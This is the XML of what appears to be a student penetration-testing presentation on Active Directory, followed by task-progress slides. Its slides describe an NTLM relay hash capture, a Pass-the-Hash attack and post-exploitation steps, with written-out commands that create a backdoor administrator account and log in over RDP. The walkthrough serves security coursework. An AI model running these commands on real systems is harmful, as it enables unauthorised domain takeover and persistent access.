          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962967" y="4659478"/>
            <a:ext cx="66490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180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8ABA6C-4AD5-0862-3024-44396BC3EA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185991" y="1492884"/>
            <a:ext cx="4674543" cy="2667636"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>We can see that the NTLM relay terminal has successfully captured the administrator hash of the Active Directory account. Using this hash, we can perform a Pass-the-Hash (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>PtH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>) attack to gain shell access to the Active Directory without requiring the actual credentials and further carry out the attack. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2B84D5-E690-BE8A-4D44-7605B60A2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951975" y="73152"/>
            <a:ext cx="7162327" cy="656539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Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226445A3-2198-5EC4-2E6B-A0FBF7234AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4951975" y="5879592"/>
            <a:ext cx="6057401" cy="60350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4779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6872-B3A4-D658-7078-E9335B08A6A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="3643674" cy="1850682"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Pass-the-Hash Attack on Active Directory </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651209A8-688A-DEF7-5C0F-630BC08FC32E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766786" y="991145"/>
            <a:ext cx="8220456" cy="859536"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Use the extracted hash of the Administrator account on the Active directory to pass the hash attack on the AD.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B24A1D-4AA6-D552-F808-828549277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8324" y="2100996"/>
            <a:ext cx="11945492" cy="468385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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF15900D-CD88-DBF9-8186-31A65B4C24C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182880" y="5257800"/>
            <a:ext cx="3054096" cy="14630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5947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C2112E-F865-E50F-F432-FD6847163BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144717" y="1296924"/>
            <a:ext cx="9905998" cy="3677412"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After successfully carrying out the attack we will get a privileged account ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> authority\system’ shell which we can use to create a privileged backdoor account to get persistent access to the AD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a new user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command used:- net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>backupusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Adminp0w3r /add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add the newly created user to the Administrator group:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command used:- net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Administrators </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>backupusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add the newly created user to the Remote Desktop Users group:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command used:- to add the user to the Remote Desktop Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable Remote Desktop on the AD if it is not already enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F55DCA2-BFF4-1F8B-E1AD-7E192F5268D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144717" y="402336"/>
            <a:ext cx="3960939" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Post Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2747824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AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E33436ED-2E2E-72A4-2F33-84CBE81741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9788" y="718184"/>
            <a:ext cx="8830594" cy="1348359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47CD28B2-A851-6736-51F3-37A800B1B4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9788" y="2528315"/>
            <a:ext cx="8841475" cy="1069848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E60138B5-F7F1-1F41-565D-7B78E12811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9788" y="4059936"/>
            <a:ext cx="8830594" cy="1399032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EABA64D-36A8-10D0-2E99-BB68F9055F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5985085" y="2066543"/>
            <a:ext cx="5441" cy="4617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2D42BC-5517-6237-AE49-CD1B938BDBFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5982364" y="3645788"/>
            <a:ext cx="5441" cy="4617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535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111EA-3D2E-AD77-A54A-47EE3EA67AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82296" y="1783081"/>
            <a:ext cx="4754880" cy="2871216"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lastly, remotely access Active Directory using the newly created user account, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>backupusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>', and obtain full access to AD, gaining control over its entire structure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xfreerdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>u:backupusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /p:Adminp0w3r /v:192.168.164.163</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E955DE-CA14-4F1E-0E69-D50DCD968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84531" y="274321"/>
            <a:ext cx="6593525" cy="5703400"/>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3919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5A8E85AB-5E38-BF1B-113A-7FC88D29A7DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="15000"/>
          </a:blip>
          <a:srcRect t="6247" b="18753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13B31C0-6F6A-077D-152A-409542C3F44B}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24146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338" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="609600"/>
            <a:ext cx="3643674" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="3643674" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="347472" indent="-347472" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>AMAL SURESH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88384867"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5147751" y="645106"/>
          <a:ext cx="5883119" cy="5247750"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:solidFill>
                  <a:srgbClr val="F2F2F2">
                    <a:alpha val="30196"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3709634">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2173485">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="874625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" b="0" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Task </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520"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2900" b="0" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Progress</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="19152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0000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="874625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Building of Website </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2900" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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900" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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0002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="874625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Linux</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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900" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="874625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Wireless</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2900" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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0004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="874625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Presentation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2900" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="874625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Report</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2900" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2900" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="248976" marR="191520" marT="191520" marB="191520">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338" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="609600"/>
            <a:ext cx="3643674" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="3643674" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="347472" indent="-347472" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>SREERAJ VAKKATTU SUNIL  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1319729455"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4630994" y="1203635"/>
          <a:ext cx="6916634" cy="4403803"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
